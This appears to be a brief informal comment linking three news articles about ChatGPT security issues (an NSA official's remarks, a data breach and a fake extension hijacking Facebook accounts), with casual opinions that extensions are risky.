https://www.wired.com/story/nsa-rob-joyce-chatgpt-security/
Well I know you can sometimes get it to tell you how to do crimes... Without jailbreaking it... And I know it's been hacked a few times... And I know that there's another thing.... But idk man....
https://cyberdaily.securelayer7.net/chatgpt-data-breach-vulnerability-threats/
No matter what anyone says - extensions are a fatal error
https://www.hackread.com/fake-chatgpt-extension-hijack-facebook/
